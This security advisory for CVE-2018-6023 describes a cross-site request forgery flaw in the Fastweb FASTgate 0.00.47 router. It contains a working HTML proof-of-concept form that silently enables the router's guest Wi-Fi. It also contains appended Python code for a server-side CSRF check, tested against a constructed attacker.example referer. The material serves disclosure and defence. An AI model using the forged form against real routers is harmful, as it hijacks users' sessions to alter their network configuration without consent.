Fastweb FASTGate 0.00.47 Cross Site Request Forgery

2018.05.10
Risk: Low
Local: No
Remote: Yes
CWE: CWE-352


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

# Exploit Title: Fastweb FASTgate 0.00.47 CSRF
# Date: 09-05-2018
# Exploit Authors: Raffaele Sabato
# Contact: https://twitter.com/syrion89
# Vendor: Fastweb
# Product Web Page: http://www.fastweb.it/adsl-fibra-ottica/dettagli/modem-fastweb-fastgate/
# Version: 0.00.47
# CVE: CVE-2018-6023

I DESCRIPTION
========================================================================

An issue was discovered in the Fastweb FASTgate 0.00.47 device. A cross-site request forgery (CSRF) vulnerability allows remote attackers to hijack the authentication of users for requests that modify the configuration. This vulnerability may lead to the Guest Wi-Fi being activated, the Wi-Fi password being changed, etc.

II PROOF OF CONCEPT
========================================================================

## Activate Guest Wi-Fi:

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://192.168.1.254/status.cgi">
      <input type="hidden" name="&#95;" value="1516312144136" />
      <input type="hidden" name="act" value="nvset" />
      <input type="hidden" name="hotspot&#95;broadcast&#95;ssid" value="1" />
      <input type="hidden" name="hotspot&#95;enable" value="1" />
      <input type="hidden" name="hotspot&#95;filtering" value="all" />
      <input type="hidden" name="hotspot&#95;security" value="WPA2PSK" />
      <input type="hidden" name="hotspot&#95;ssid" value="GUEST&#45;Test" />
      <input type="hidden" name="hotspot&#95;timeout" value="&#45;1" />
      <input type="hidden" name="service" value="wl&#95;guestaccess" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

III REFERENCES
========================================================================

http://www.fastweb.it/myfastpage/assistenza/guide/FASTGate/
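The form in the proof of concept has no method attribute, so the browser submits it as a GET to status.cgi, and the request carries nothing that ties it to a page served by the device. The following is an added example, not part of the advisory or of the vendor's firmware: a server-side check that refuses such a request. The function names, the X-CSRF-Token header and the HMAC token scheme are assumptions; only act=nvset and the router address come from the PoC.

```python
import hashlib
import hmac
from urllib.parse import urlsplit

# Hypothetical names and values: only act=nvset and the router address come
# from the advisory's PoC; the token scheme and header name are assumptions.
TRUSTED_ORIGINS = {"http://192.168.1.254"}
STATE_CHANGING_ACTS = {"nvset"}

def issue_token(session_id, secret):
    """Per-session anti-CSRF token: HMAC-SHA256 of the session id."""
    return hmac.new(secret, session_id.encode(), hashlib.sha256).hexdigest()

def request_origin(headers):
    """scheme://host[:port] taken from Origin, else Referer; None if unusable."""
    value = headers.get("Origin") or headers.get("Referer") or ""
    parts = urlsplit(value)
    if not parts.scheme or not parts.netloc:
        return None
    return f"{parts.scheme}://{parts.netloc}"

def check_request(method, params, headers, session_id, secret):
    """Return (allowed, reason) for one request to the configuration CGI."""
    if params.get("act") not in STATE_CHANGING_ACTS:
        return True, "read-only action"
    if method != "POST":
        return False, "state change must use POST"
    if request_origin(headers) not in TRUSTED_ORIGINS:
        return False, "cross-origin or missing Origin/Referer"
    expected = issue_token(session_id, secret)
    supplied = headers.get("X-CSRF-Token", "")
    if not hmac.compare_digest(supplied.encode(), expected.encode()):
        return False, "missing or invalid CSRF token"
    return True, "ok"

if __name__ == "__main__":
    secret, sid = b"constructed-demo-secret", "session-1"
    # Constructed requests: (method, params, headers)
    samples = [
        ("GET", {"act": "nvset", "hotspot_enable": "1"},
         {"Referer": "http://attacker.example/poc.html"}),
        ("POST", {"act": "nvset", "hotspot_enable": "1"},
         {"Origin": "http://192.168.1.254",
          "X-CSRF-Token": issue_token(sid, secret)}),
    ]
    for method, params, headers in samples:
        print(method, check_request(method, params, headers, sid, secret))
```

The header dictionary is assumed to use canonical header names; a real handler would normalise case before the lookup.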



Copyright 2018, cxsecurity.com

 
